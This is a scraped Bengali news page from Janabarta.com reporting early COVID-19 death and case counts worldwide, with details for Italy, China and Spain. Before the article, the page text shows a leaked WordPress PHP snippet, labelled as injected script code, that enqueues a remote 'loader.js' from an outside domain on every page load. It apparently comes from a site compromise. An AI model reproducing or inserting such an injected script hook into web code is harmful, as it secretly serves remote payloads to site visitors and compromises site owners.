// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site কোরোনাঃ প্রাণহানি গিয়ে দাঁড়াল ১১ হাজার ৪০৫ জনে - Janabarta.com

কোরোনাঃ প্রাণহানি গিয়ে দাঁড়াল ১১ হাজার ৪০৫ জনে

জনবার্তা ডেস্কঃ করোনাভাইরাসের সঙ্গে যুদ্ধে পেরে উঠছে না মানবজাতি। প্রাণঘাতী ছোঁয়াচে এই ভাইরাস ছড়িয়ে পড়েছে ১৮৫ দেশে। বিশ্বজুড়ে এখন পর্যন্ত আক্রান্ত হয়েছেন ২ লক্ষ ৭৬ হাজার ১০ জন। প্রাণহানি হয়েছে ১১ হাজার ৪০৫ জনের। চিকিৎসা নিয়ে সুস্থ হয়ে বাড়ি ফিরেছেন প্রায় ৯২ হাজার মানুষ।

আক্রান্তদের মধ্যে ১ লক্ষ ৬৪ হাজার ৭৪৫ জন স্থিতিশীল অবস্থায় আছেন। অবস্থা খুবই ঝুঁকিপূর্ণ, এমন আছেন প্রায় ৮ হাজার রোগী।

বলা বাহুল্য, ইতালির অবস্থা খুবই শোচনীয়। যে চীন থেকে করোনাভাইরাসের উৎপত্তি এবং আক্রান্তের সংখ্যা সর্বোচ্চ সেই চীনকেও মৃত্যুর দিকে থেকে ইতালি ছাড়িয়ে গেছে দুদিন আগেই। দেশটিতে হু হু করে বাড়ছে লাশের সংখ্যা। সবশেষ খবর অনুযায়ী, ইতালিতে মোট মৃতের সংখ্যা ৪ হাজার ৩২ জন। অন্যদিকে চীনে মারা গেছেন ৩ হাজার ২৫৫ জন।

চীনে যেখানে নতুন আক্রান্তের খবর নেই বললেই চলে সেখানে ইতালিতে গত ২৪ ঘণ্টায় করোনাভাইরাসে আক্রান্ত হয়েছেন প্রায় ৬ হাজার মানুষ। একই সময়ে সেখানে মারা গেছেন ৬২৭ জন। করোনাভাইরাসে এর আগে কোনো দেশে একদিনে এত মানুষের মৃত্যু হয়নি।

খারাপ অবস্থা ইউরোপের আরেক দেশ স্পেনের। গত ২৪ ঘণ্টায় সেখানে মারা গেছে ২৬২ জন। সর্বমোট মৃত্যু ১ হাজার ১০০। নতুন করে আক্রান্ত হয়েছেন প্রায় সাড়ে ৩ হাজার। মোট আক্রান্তের সংখ্যা ২১ হাজার ৫৭১জন। স্পেনের পরপরই টালমাটাল অবস্থায় আছে ইরান, জার্মানি ও যুক্তরাষ্ট্র।